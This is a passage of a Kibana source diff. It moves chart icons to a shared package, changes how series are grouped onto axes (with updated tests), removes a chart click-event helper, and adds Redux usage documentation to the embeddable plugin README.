icon: BarStackedIcon }, - { id: `${SeriesTypes.BAR}_horizontal`, icon: BarHorizontalIcon }, - { id: `${SeriesTypes.BAR}_percentage_stacked`, icon: BarPercentageIcon }, - { id: `${SeriesTypes.BAR}_horizontal_stacked`, icon: BarHorizontalStackedIcon }, - { id: `${SeriesTypes.BAR}_horizontal_percentage_stacked`, icon: BarHorizontalPercentageIcon }, - { id: SeriesTypes.LINE, icon: LineIcon }, - { id: `${SeriesTypes.LINE}_stacked`, icon: LineIcon }, - { id: SeriesTypes.AREA, icon: AreaIcon }, - { id: `${SeriesTypes.AREA}_stacked`, icon: AreaStackedIcon }, - { id: `${SeriesTypes.AREA}_percentage_stacked`, icon: AreaPercentageIcon }, + { id: SeriesTypes.BAR, icon: IconChartBar }, + { id: `${SeriesTypes.BAR}_stacked`, icon: IconChartBarStacked }, + { id: `${SeriesTypes.BAR}_horizontal`, icon: IconChartBarHorizontal }, + { id: `${SeriesTypes.BAR}_percentage_stacked`, icon: IconChartBarPercentage }, + { id: `${SeriesTypes.BAR}_horizontal_stacked`, icon: IconChartBarHorizontalStacked }, + { + id: `${SeriesTypes.BAR}_horizontal_percentage_stacked`, + icon: IconChartBarHorizontalPercentage, + }, + { id: `${SeriesTypes.LINE}_stacked`, icon: IconChartLine }, + { id: SeriesTypes.LINE, icon: IconChartLine }, + { id: SeriesTypes.AREA, icon: IconChartArea }, + { id: `${SeriesTypes.AREA}_stacked`, icon: IconChartAreaStacked }, + { id: `${SeriesTypes.AREA}_percentage_stacked`, icon: IconChartAreaPercentage }, ]; diff --git a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts index 35019d75e0554..183a798056edb 100644 --- a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts +++ b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.test.ts @@ -7,7 +7,7 @@ */ import { FieldFormat } from '@kbn/field-formats-plugin/common'; -import { DataLayerConfig, YAxisConfigResult } from '../../common'; +import { DataLayerConfig, YAxisConfigResult, DataDecorationConfigResult } from '../../common'; import { LayerTypes } from '../../common/constants'; import { Datatable } from '@kbn/expressions-plugin/public'; import { getAxesConfiguration } from './axes_configuration'; @@ -218,6 +218,20 @@ describe('axes_configuration', () => { params: { id: 'currency' }, }, }, + { + id: 'yAccessorId5', + name: 'Other column', + meta: { + type: 'number', + source: 'esaggs', + index: 'indexPatternId', + sourceParams: { + indexPatternId: 'indexPatternId', + type: 'count', + }, + params: { id: 'number' }, + }, + }, ], }, }; @@ -228,6 +242,11 @@ describe('axes_configuration', () => { position: 'right', type: 'yAxisConfig', }, + { + id: '2', + position: 'left', + type: 'yAxisConfig', + }, ]; const sampleLayer: DataLayerConfig = { @@ -256,6 +275,7 @@ describe('axes_configuration', () => { yAccessorId: { id: 'number', params: {} }, yAccessorId3: { id: 'currency', params: {} }, yAccessorId4: { id: 'currency', params: {} }, + yAccessorId5: { id: 'number', params: {} }, }, splitSeriesAccessors: { d: { format: { id: 'number', params: {} }, formatter: {} as FieldFormat }, @@ -269,11 +289,35 @@ describe('axes_configuration', () => { const formatFactory = jest.fn(); const groups = getAxesConfiguration([sampleLayer], false, formatFactory, fieldFormats, []); expect(groups.length).toEqual(1); + expect(groups[0].groupId).toEqual('left'); expect(groups[0].position).toEqual('left'); expect(groups[0].series[0].accessor).toEqual('yAccessorId'); expect(groups[0].series[0].layer).toEqual('first'); }); + it('should map auto series to defined left axis if formatters match', () => { + const formatFactory = jest.fn(); + const groups = getAxesConfiguration( + [ + { + ...sampleLayer, + accessors: ['yAccessorId', 'yAccessorId5'], + decorations: [{ type: 'dataDecorationConfig', forAccessor: 'yAccessorId', axisId: '2' }], + }, + ], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); + expect(groups.length).toEqual(1); + expect(groups[0].groupId).toEqual('axis-2'); + expect(groups[0].position).toEqual('left'); + expect(groups[0].series[0].accessor).toEqual('yAccessorId'); + expect(groups[0].series[1].accessor).toEqual('yAccessorId5'); + expect(groups[0].series[0].layer).toEqual('first'); + }); + it('should map auto series to right axis if formatters do not match', () => { const formatFactory = jest.fn(); const twoSeriesLayer = { ...sampleLayer, accessors: ['yAccessorId', 'yAccessorId2'] }; @@ -285,13 +329,72 @@ describe('axes_configuration', () => { expect(groups[1].series[0].accessor).toEqual('yAccessorId2'); }); - it('should map auto series to left if left and right are already filled with non-matching series', () => { + it('should map auto series to left axis if formatters do not match with defined left axis', () => { + const formatFactory = jest.fn(); + const groups = getAxesConfiguration( + [ + { + ...sampleLayer, + accessors: ['yAccessorId', 'yAccessorId3'], + decorations: [{ type: 'dataDecorationConfig', forAccessor: 'yAccessorId', axisId: '2' }], + }, + ], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); + expect(groups.length).toEqual(2); + expect(groups[0].groupId).toEqual('axis-2'); + expect(groups[0].position).toEqual('left'); + expect(groups[0].series[0].accessor).toEqual('yAccessorId'); + expect(groups[0].series[0].layer).toEqual('first'); + expect(groups[1].groupId).toEqual('right'); + expect(groups[1].position).toEqual('right'); + expect(groups[1].series[0].accessor).toEqual('yAccessorId3'); + expect(groups[1].series[0].layer).toEqual('first'); + }); + + it('should map auto series to defined left axis if defined left and right are already filled with non-matching series', () => { + const formatFactory = jest.fn(); + const threeSeriesLayer = { + ...sampleLayer, + accessors: ['yAccessorId', 'yAccessorId2', 'yAccessorId3'], + decorations: [ + { type: 'dataDecorationConfig', forAccessor: 'yAccessorId', axisId: '1' }, + { type: 'dataDecorationConfig', forAccessor: 'yAccessorId2', axisId: '2' }, + ] as DataDecorationConfigResult[], + }; + const groups = getAxesConfiguration( + [threeSeriesLayer], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); + expect(groups.length).toEqual(2); + expect(groups[0].groupId).toEqual('axis-1'); + expect(groups[0].position).toEqual('right'); + expect(groups[1].groupId).toEqual('axis-2'); + expect(groups[1].position).toEqual('left'); + expect(groups[0].series[0].accessor).toEqual('yAccessorId'); + expect(groups[1].series[0].accessor).toEqual('yAccessorId2'); + expect(groups[1].series[1].accessor).toEqual('yAccessorId3'); + }); + + it('should map auto series to left if not-defined left and right are already filled with non-matching series', () => { const formatFactory = jest.fn(); const threeSeriesLayer = { ...sampleLayer, accessors: ['yAccessorId', 'yAccessorId2', 'yAccessorId3'], }; - const groups = getAxesConfiguration([threeSeriesLayer], false, formatFactory, fieldFormats, []); + const groups = getAxesConfiguration( + [threeSeriesLayer], + false, + formatFactory, + fieldFormats, + yAxisConfigs + ); expect(groups.length).toEqual(2); expect(groups[0].position).toEqual('left'); expect(groups[1].position).toEqual('right'); diff --git a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts index f95423ea83854..7f9f6c49824b8 100644 --- a/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts +++ b/src/plugins/chart_expressions/expression_xy/public/helpers/axes_configuration.ts @@ -113,8 +113,13 @@ export function groupAxesByType( const tablesExist = layers.filter(({ table }) => Boolean(table)).length > 0; - leftSeriesKeys.push(LEFT_GLOBAL_AXIS_ID); - rightSeriesKeys.push(RIGHT_GLOBAL_AXIS_ID); + if (!leftSeriesKeys.length) { + leftSeriesKeys.push(LEFT_GLOBAL_AXIS_ID); + } + + if (!rightSeriesKeys.length) { + rightSeriesKeys.push(RIGHT_GLOBAL_AXIS_ID); + } series.auto.forEach((currentSeries) => { const leftAxisGroupId = tablesExist @@ -129,16 +134,23 @@ export function groupAxesByType( ) : undefined; - let axisGroupId = LEFT_GLOBAL_AXIS_ID; - - if (series[LEFT_GLOBAL_AXIS_ID].length === 0 || leftAxisGroupId) { - axisGroupId = leftAxisGroupId || LEFT_GLOBAL_AXIS_ID; - } else if (series[RIGHT_GLOBAL_AXIS_ID].length === 0 || rightAxisGroupId) { - axisGroupId = rightAxisGroupId || RIGHT_GLOBAL_AXIS_ID; - } else if (series[RIGHT_GLOBAL_AXIS_ID].length >= series[LEFT_GLOBAL_AXIS_ID].length) { - axisGroupId = LEFT_GLOBAL_AXIS_ID; + const rightSeriesCount = rightSeriesKeys.reduce((acc, key) => { + return acc + series[key].length; + }, 0); + const leftSeriesCount = leftSeriesKeys.reduce((acc, key) => { + return acc + series[key].length; + }, 0); + + let axisGroupId; + + if (leftSeriesCount === 0 || leftAxisGroupId) { + axisGroupId = leftAxisGroupId || leftSeriesKeys[0]; + } else if (rightSeriesCount === 0 || rightAxisGroupId) { + axisGroupId = rightAxisGroupId || rightSeriesKeys[0]; + } else if (rightSeriesCount >= leftSeriesCount) { + axisGroupId = leftSeriesKeys[0]; } else { - axisGroupId = RIGHT_GLOBAL_AXIS_ID; + axisGroupId = rightSeriesKeys[0]; } series[axisGroupId].push(currentSeries); diff --git a/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts b/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts index 8b4113b3ada11..a74d4196f487d 100644 --- a/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts +++ b/src/plugins/chart_expressions/expression_xy/public/helpers/icon.ts @@ -7,7 +7,7 @@ */ import { i18n } from '@kbn/i18n'; -import { TriangleIcon, CircleIcon } from '../icons'; +import { IconTriangle, IconCircle } from '@kbn/chart-icons'; import { AvailableReferenceLineIcons } from '../../common/constants'; export function hasIcon(icon: string | undefined): icon is string { @@ -56,7 +56,7 @@ export const iconSet = [ label: i18n.translate('expressionXY.xyChart.iconSelect.circleIconLabel', { defaultMessage: 'Circle', }), - icon: CircleIcon, + icon: IconCircle, canFill: true, }, @@ -105,7 +105,7 @@ export const iconSet = [ label: i18n.translate('expressionXY.xyChart.iconSelect.triangleIconLabel', { defaultMessage: 'Triangle', }), - icon: TriangleIcon, + icon: IconTriangle, shouldRotate: true, canFill: true, }, diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/area_percentage.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/area_percentage.tsx deleted file mode 100644 index a51e66b68ba93..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/area_percentage.tsx +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const AreaPercentageIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/area_stacked.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/area_stacked.tsx deleted file mode 100644 index c2b9fbe926328..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/area_stacked.tsx +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const AreaStackedIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_reference_line.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/bar_reference_line.tsx deleted file mode 100644 index 95bd8e2a8d0a2..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_reference_line.tsx +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const BarReferenceLineIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - - - -); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/index.ts b/src/plugins/chart_expressions/expression_xy/public/icons/index.ts deleted file mode 100644 index 4ca0b640a3d89..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/index.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { BarHorizontalPercentageIcon } from './bar_horizontal_percentage'; -export { BarHorizontalStackedIcon } from './bar_horizontal_stacked'; -export { BarReferenceLineIcon } from './bar_reference_line'; -export { AreaPercentageIcon } from './area_percentage'; -export { BarHorizontalIcon } from './bar_horizontal'; -export { BarPercentageIcon } from './bar_percentage'; -export { AreaStackedIcon } from './area_stacked'; -export { BarStackedIcon } from './bar_stacked'; -export { TriangleIcon } from './triangle'; -export { MixedXyIcon } from './mixed_xy'; -export { CircleIcon } from './circle'; -export { AreaIcon } from './area'; -export { LineIcon } from './line'; -export { BarIcon } from './bar'; diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/line.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/line.tsx deleted file mode 100644 index 6735f58b734ec..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/line.tsx +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const LineIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - -); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/mixed_xy.tsx b/src/plugins/chart_expressions/expression_xy/public/icons/mixed_xy.tsx deleted file mode 100644 index e16b7f6bed76f..0000000000000 --- a/src/plugins/chart_expressions/expression_xy/public/icons/mixed_xy.tsx +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiIconProps } from '@elastic/eui'; - -export const MixedXyIcon = ({ title, titleId, ...props }: Omit) => ( - - {title ? {title} : null} - - - - -); diff --git a/src/plugins/charts/public/index.ts b/src/plugins/charts/public/index.ts index d6cae90d50057..8fd3fcf29f2cb 100644 --- a/src/plugins/charts/public/index.ts +++ b/src/plugins/charts/public/index.ts @@ -9,6 +9,7 @@ // TODO: https://github.com/elastic/kibana/issues/110891 /* eslint-disable @kbn/eslint/no_export_all */ +import { RangeSelectContext, ValueClickContext } from '@kbn/embeddable-plugin/public'; import { ChartsPlugin } from './plugin'; export const plugin = () => new ChartsPlugin(); @@ -19,6 +20,16 @@ export * from './static'; export { lightenColor } from './services/palettes/lighten_color'; export { useActiveCursor } from './services/active_cursor'; +export interface ClickTriggerEvent { + name: 'filter'; + data: ValueClickContext['data']; +} + +export interface BrushTriggerEvent { + name: 'brush'; + data: RangeSelectContext['data']; +} + export type { CustomPaletteArguments, CustomPaletteState, diff --git a/src/plugins/charts/public/static/index.ts b/src/plugins/charts/public/static/index.ts index 53078eebe9c56..031e90019d3c1 100644 --- a/src/plugins/charts/public/static/index.ts +++ b/src/plugins/charts/public/static/index.ts @@ -8,5 +8,4 @@ export * from './colors'; export * from './components'; -export * from './utils'; export * from '../../common/static/styles'; diff --git a/src/plugins/charts/public/static/utils/transform_click_event.ts b/src/plugins/charts/public/static/utils/transform_click_event.ts deleted file mode 100644 index ec35fa85d59a1..0000000000000 --- a/src/plugins/charts/public/static/utils/transform_click_event.ts +++ /dev/null @@ -1,282 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { - XYChartSeriesIdentifier, - GeometryValue, - XYBrushEvent, - Accessor, - AccessorFn, - Datum, -} from '@elastic/charts'; - -import { RangeSelectContext, ValueClickContext } from '@kbn/embeddable-plugin/public'; -import { Datatable } from '@kbn/expressions-plugin/public'; - -export interface ClickTriggerEvent { - name: 'filter'; - data: ValueClickContext['data']; -} - -export interface BrushTriggerEvent { - name: 'brush'; - data: RangeSelectContext['data']; -} - -type AllSeriesAccessors = Array< - [accessor: Accessor | AccessorFn, value: string | number] ->; - -/** - * returns accessor value from string or function accessor - * @param datum - * @param accessor - */ -function getAccessorValue(datum: D, accessor: Accessor | AccessorFn) { - if (typeof accessor === 'function') { - return accessor(datum); - } - - return (datum as Datum)[accessor]; -} - -/** - * This is a little unorthodox, but using functional accessors makes it - * difficult to match the correct column. This creates a test object to throw - * an error when the target id is accessed, thus matcing the target column. - */ -function validateAccessorId(id: string, accessor: Accessor | AccessorFn) { - if (typeof accessor !== 'function') { - return id === accessor; - } - - const matchedMessage = 'validateAccessorId matched'; - - try { - accessor({ - get [id]() { - throw new Error(matchedMessage); - }, - }); - return false; - } catch ({ message }) { - return message === matchedMessage; - } -} - -/** - * Groups split accessors by their accessor string or function and related value - * - * @param splitAccessors - * @param splitSeriesAccessorFnMap - */ -const getAllSplitAccessors = ( - splitAccessors: Map, - splitSeriesAccessorFnMap?: Map -): Array<[accessor: Accessor | AccessorFn, value: string | number]> => - [...splitAccessors.entries()].map(([key, value]) => [ - splitSeriesAccessorFnMap?.get?.(key) ?? key, - value, - ]); - -/** - * Gets value from small multiple accessors - * - * Only handles single small multiple accessor - */ -function getSplitChartValue({ - smHorizontalAccessorValue, - smVerticalAccessorValue, -}: Pick): - | string - | number - | undefined { - if (smHorizontalAccessorValue !== undefined) { - return smHorizontalAccessorValue; - } - - if (smVerticalAccessorValue !== undefined) { - return smVerticalAccessorValue; - } - - return; -} - -/** - * Reduces matching column indexes - * - * @param xAccessor - * @param yAccessor - * @param splitAccessors - */ -const columnReducer = - ( - xAccessor: Accessor | AccessorFn | null, - yAccessor: Accessor | AccessorFn | null, - splitAccessors: AllSeriesAccessors, - splitChartAccessor?: Accessor | AccessorFn - ) => - ( - acc: Array<[index: number, id: string]>, - { id }: Datatable['columns'][number], - index: number - ): Array<[index: number, id: string]> => { - if ( - (xAccessor !== null && validateAccessorId(id, xAccessor)) || - (yAccessor !== null && validateAccessorId(id, yAccessor)) || - (splitChartAccessor !== undefined && validateAccessorId(id, splitChartAccessor)) || - splitAccessors.some(([accessor]) => validateAccessorId(id, accessor)) - ) { - acc.push([index, id]); - } - - return acc; - }; - -/** - * Finds matching row index for given accessors and geometry values - * - * @param geometry - * @param xAccessor - * @param yAccessor - * @param splitAccessors - */ -const rowFindPredicate = - ( - geometry: GeometryValue | null, - xAccessor: Accessor | AccessorFn | null, - yAccessor: Accessor | AccessorFn | null, - splitAccessors: AllSeriesAccessors, - splitChartAccessor?: Accessor | AccessorFn, - splitChartValue?: string | number - ) => - (row: Datatable['rows'][number]): boolean => - (geometry === null || - (xAccessor !== null && - getAccessorValue(row, xAccessor) === getAccessorValue(geometry.datum, xAccessor) && - yAccessor !== null && - getAccessorValue(row, yAccessor) === getAccessorValue(geometry.datum, yAccessor) && - (splitChartAccessor === undefined || - (splitChartValue !== undefined && - getAccessorValue(row, splitChartAccessor) === splitChartValue)))) && - [...splitAccessors].every(([accessor, value]) => getAccessorValue(row, accessor) === value); - -/** - * Helper function to transform `@elastic/charts` click event into filter action event - * - * @param table - * @param xAccessor - * @param splitSeriesAccessorFnMap needed when using `splitSeriesAccessors` as `AccessorFn` - * @param negate - */ -export const getFilterFromChartClickEventFn = - ( - table: Datatable, - xAccessor: Accessor | AccessorFn, - splitSeriesAccessorFnMap?: Map, - splitChartAccessor?: Accessor | AccessorFn, - negate: boolean = false - ) => - (points: Array<[GeometryValue, XYChartSeriesIdentifier]>): ClickTriggerEvent => { - const data: ValueClickContext['data']['data'] = []; - - points.forEach((point) => { - const [geometry, { yAccessor, splitAccessors }] = point; - const splitChartValue = getSplitChartValue(point[1]); - const allSplitAccessors = getAllSplitAccessors(splitAccessors, splitSeriesAccessorFnMap); - const columns = table.columns.reduce>( - columnReducer(xAccessor, yAccessor, allSplitAccessors, splitChartAccessor), - [] - ); - const row = table.rows.findIndex( - rowFindPredicate( - geometry, - xAccessor, - yAccessor, - allSplitAccessors, - splitChartAccessor, - splitChartValue - ) - ); - const newData = columns.map(([column, id]) => ({ - table, - column, - row, - value: table.rows?.[row]?.[id] ?? null, - })); - - data.push(...newData); - }); - - return { - name: 'filter', - data: { - negate, - data, - }, - }; - }; - -/** - * Helper function to get filter action event from series - */ -export const getFilterFromSeriesFn = - (table: Datatable) => - ( - { splitAccessors, ...rest }: XYChartSeriesIdentifier, - splitSeriesAccessorFnMap?: Map, - splitChartAccessor?: Accessor | AccessorFn, - negate = false - ): ClickTriggerEvent => { - const splitChartValue = getSplitChartValue(rest); - const allSplitAccessors = getAllSplitAccessors(splitAccessors, splitSeriesAccessorFnMap); - const columns = table.columns.reduce>( - columnReducer(null, null, allSplitAccessors, splitChartAccessor), - [] - ); - const row = table.rows.findIndex( - rowFindPredicate(null, null, null, allSplitAccessors, splitChartAccessor, splitChartValue) - ); - const data: ValueClickContext['data']['data'] = columns.map(([column, id]) => ({ - table, - column, - row, - value: table.rows?.[row]?.[id] ?? null, - })); - - return { - name: 'filter', - data: { - negate, - data, - }, - }; - }; - -/** - * Helper function to transform `@elastic/charts` brush event into brush action event - */ -export function getBrushFromChartBrushEventFn( - table: Datatable, - xAccessor: Accessor | AccessorFn -) { - return ({ x: selectedRange }: XYBrushEvent): BrushTriggerEvent => { - const [start, end] = selectedRange ?? [0, 0]; - const range: [number, number] = [start, end]; - const column = table.columns.findIndex(({ id }) => validateAccessorId(id, xAccessor)); - - return { - data: { - table, - column, - range, - }, - name: 'brush', - }; - }; -} diff --git a/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts b/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts index a696c8bc15b83..0c6aaba99b9ee 100644 --- a/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts +++ b/src/plugins/dashboard/public/application/lib/dashboard_session_storage.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { Storage } from '../../services/kibana_utils'; import { NotificationsStart } from '../../services/core'; import { panelStorageErrorStrings } from '../../dashboard_strings'; diff --git a/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts b/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts index 719687ea970bd..c25c6a70c994e 100644 --- a/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts +++ b/src/plugins/data/common/search/aggs/metrics/top_hit.test.ts @@ -12,6 +12,7 @@ import { AggConfigs } from '../agg_configs'; import { mockAggTypesRegistry } from '../test_helpers'; import { IMetricAggConfig } from './metric_agg_type'; import { KBN_FIELD_TYPES } from '../../..'; +import * as tabifyModule from '../../tabify/tabify_docs'; describe('Top hit metric', () => { let aggDsl: Record; @@ -79,6 +80,11 @@ describe('Top hit metric', () => { aggDsl = aggConfig.toDsl(aggConfigs); }; + const flattenSpy = jest.spyOn(tabifyModule, 'flattenHit'); + beforeEach(() => { + jest.clearAllMocks(); + }); + it('should return a label prefixed with Last if sorting in descending order', () => { init({ fieldName: 'bytes' }); expect(getTopHitMetricAgg().makeLabel(aggConfig)).toEqual('Last bytes'); @@ -208,6 +214,7 @@ describe('Top hit metric', () => { init({ fieldName: '@tags' }); expect(getTopHitMetricAgg().getValue(aggConfig, bucket)).toBe('aaa'); + expect(flattenSpy).toHaveLastReturnedWith({ '@tags': 'aaa' }); }); it('should return the object if the field value is an object', () => { @@ -232,6 +239,7 @@ describe('Top hit metric', () => { expect(getTopHitMetricAgg().getValue(aggConfig, bucket)).toEqual({ label: 'aaa', }); + expect(flattenSpy).toHaveLastReturnedWith({ '@tags': { label: 'aaa' } }); }); it('should return an array if the field has more than one values', () => { @@ -251,6 +259,7 @@ describe('Top hit metric', () => { init({ fieldName: '@tags' }); expect(getTopHitMetricAgg().getValue(aggConfig, bucket)).toEqual(['aaa', 'bbb']); + expect(flattenSpy).toHaveLastReturnedWith({ '@tags': ['aaa', 'bbb'] }); }); it('should return undefined if the field is not in the source nor in the doc_values field', () => { diff --git a/src/plugins/data/common/search/aggs/metrics/top_hit.ts b/src/plugins/data/common/search/aggs/metrics/top_hit.ts index ce120f1271632..fee74bade2aa1 100644 --- a/src/plugins/data/common/search/aggs/metrics/top_hit.ts +++ b/src/plugins/data/common/search/aggs/metrics/top_hit.ts @@ -11,7 +11,7 @@ import { i18n } from '@kbn/i18n'; import { aggTopHitFnName } from './top_hit_fn'; import { IMetricAggConfig, MetricAggType } from './metric_agg_type'; import { METRIC_TYPES } from './metric_agg_types'; -import { KBN_FIELD_TYPES } from '../../..'; +import { flattenHit, KBN_FIELD_TYPES } from '../../..'; import { BaseAggParams } from '../types'; export interface AggParamsTopHit extends BaseAggParams { @@ -216,7 +216,7 @@ export const getTopHitMetricAgg = () => { let values = _.flatten( hits.map((hit) => - path === '_source' ? hit._source : agg.getIndexPattern().flattenHit(hit, true)[path] + path === '_source' ? hit._source : flattenHit(hit, agg.getIndexPattern())[path] ) ); diff --git a/src/plugins/data/common/search/search_source/search_source.ts b/src/plugins/data/common/search/search_source/search_source.ts index 9f16795efa37a..5f4ce4be637a8 100644 --- a/src/plugins/data/common/search/search_source/search_source.ts +++ b/src/plugins/data/common/search/search_source/search_source.ts @@ -58,7 +58,7 @@ * `appSearchSource`. */ -import { setWith } from '@elastic/safer-lodash-set'; +import { setWith } from '@kbn/safer-lodash-set'; import { difference, isEqual, isFunction, isObject, keyBy, pick, uniqueId, uniqWith } from 'lodash'; import { catchError, diff --git a/src/plugins/embeddable/README.md b/src/plugins/embeddable/README.md index fc6632252bb01..14fab2f8412f3 100644 --- a/src/plugins/embeddable/README.md +++ b/src/plugins/embeddable/README.md @@ -4,6 +4,7 @@ The Embeddables Plugin provides an opportunity to expose reusable interactive wi ## Capabilities - Framework-agnostic API. - Out-of-the-box React support. +- Integration with Redux. - Integration with the [UI Actions](https://github.com/elastic/kibana/tree/HEAD/src/plugins/ui_actions) plugin. - Hierarchical structure to enclose multiple widgets. - Error handling. @@ -354,6 +355,251 @@ The plugin provides a set of ready-to-use React components that abstract renderi Apart from the React components, there is also a way to construct an embeddable object using `useEmbeddableFactory` hook. This React hook takes care of producing an embeddable and updating its input state if passed state changes. +### Redux +The plugin provides an adapter for Redux over the embeddable state. +It uses the Redux Toolkit library underneath and works as a decorator on top of the [`configureStore`](https://redux-toolkit.js.org/api/configureStore) function. +In other words, it provides a way to use the full power of the library together with the embeddable plugin features. + +The adapter implements a bi-directional sync mechanism between the embeddable instance and the Redux state. +To perform state mutations, the plugin also exposes a pre-defined state of the actions that can be extended by an additional reducer. + +Here is an example of initializing a Redux store: +```tsx +import React from 'react'; +import { render } from 'react-dom'; +import { connect, Provider } from 'react-redux'; +import { Embeddable, IEmbeddable } from '@kbn/embeddable-plugin/public'; +import { createStore, State } from '@kbn/embeddable-plugin/public/store'; +import { HelloWorldComponent } from './hello_world_component'; + +export const HELLO_WORLD = 'HELLO_WORLD'; + +export class HelloWorld extends Embeddable { + readonly type = HELLO_WORLD; + + readonly store = createStore(this); + + reload() {} + + render(node: HTMLElement) { + const Component = connect((state: State) => ({ title: state.input.title }))( + HelloWorldComponent + ); + + render( + + + , + node + ); + } +} +``` + +Then inside the embedded component, it is possible to use the [`useSelector`](https://react-redux.js.org/api/hooks#useselector) and [`useDispatch`](https://react-redux.js.org/api/hooks#usedispatch) hooks. +```tsx +import React from 'react'; +import { useDispatch, useSelector } from 'react-redux'; +import { actions, State } from '@kbn/embeddable-plugin/public/store'; +import { ViewMode } from '@kbn/embeddable-plugin/public'; +import type { HelloWorld } from './hello_world'; + +interface HelloWorldComponentProps { + title?: string; +} + +export function HelloWorldComponent({ title }: HelloWorldComponentProps) { + const viewMode = useSelector>(({ input }) => input.viewMode); + const dispatch = useDispatch(); + + return ( +
+

{title}

+ {viewMode === ViewMode.EDIT && ( + dispatch(actions.input.setTitle(target.value))} + /> + )} +
+ ); +} +``` + +#### Custom Properties +The `createStore` function provides an option to pass a custom reducer in the second argument. +That reducer will be merged with the one the embeddable plugin provides. +That means there is no need to reimplement already existing actions. + +```tsx +import React from 'react'; +import { render } from 'react-dom'; +import { createSlice } from '@reduxjs/toolkit'; +import { + Embeddable, + EmbeddableInput, + EmbeddableOutput, + IEmbeddable +} from '@kbn/embeddable-plugin/public'; +import { createStore, State } from '@kbn/embeddable-plugin/public/store'; + +interface HelloWorldInput extends EmbeddableInput { + greeting?: string; +} + +interface HelloWorldOutput extends EmbeddableOutput { + message?: string; +} + +const input = createSlice({ + name: 'hello-world-input', + initialState: {} as HelloWorldInput, + reducers: { + setGreeting(state, action: PayloadAction) { + state.greeting = action.payload; + }, + }, +}); + +const output = createSlice({ + name: 'hello-world-input', + initialState: {} as HelloWorldOutput, + reducers: { + setMessage(state, action: PayloadAction) { + state.message = 